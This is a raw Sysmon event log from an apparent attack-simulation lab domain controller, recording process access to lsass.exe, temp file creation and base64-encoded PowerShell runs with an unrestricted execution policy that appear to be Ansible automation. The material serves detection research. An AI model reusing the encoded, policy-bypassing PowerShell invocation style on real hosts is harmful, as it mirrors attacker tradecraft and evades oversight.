13:54:12.797{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003796Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.766{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_edjxf32p.2yl.ps12020-12-08 13:54:12.766 10341000x80000000000000003795Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.751{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003794Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8583-5FCF-B600-000000009101}45204532C:\Windows\system32\conhost.exe{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003793Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003792Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003791Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003790Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003789Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003788Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003787Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003786Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003785Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003784Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003783Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.735{10ACEC4A-8583-5FCF-B900-000000009101}49682772C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF819009230) 154100x80000000000000003782Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.736{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG4AcwB0AGEAbABsAC0AUABhAGMAawBhAGcAZQBQAHIAbwB2AGkAZABlAHIAIAAtAE4AYQBtAGUAIABOAHUARwBlAHQAIAAtAE0AaQBuAGkAbQB1AG0AVgBlAHIAcwBpAG8AbgAgADIALgA4AC4ANQAuADIAMAAxACAALQBGAG8AcgBjAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8583-5FCF-F6EB-060000000000}0x6ebf60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003781Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.532{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003780Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.532{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003779Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.532{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003778Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:12.501{10ACEC4A-8584-5FCF-BB00-000000009101}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\4bzgp5jb.dll2020-12-08 13:54:12.392 10341000x80000000000000003777Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.501{10ACEC4A-8583-5FCF-B600-000000009101}45204532C:\Windows\system32\conhost.exe{10ACEC4A-8584-5FCF-BC00-000000009101}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003776Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.485{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003775Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.485{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003774Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.485{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003773Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.485{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003772Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 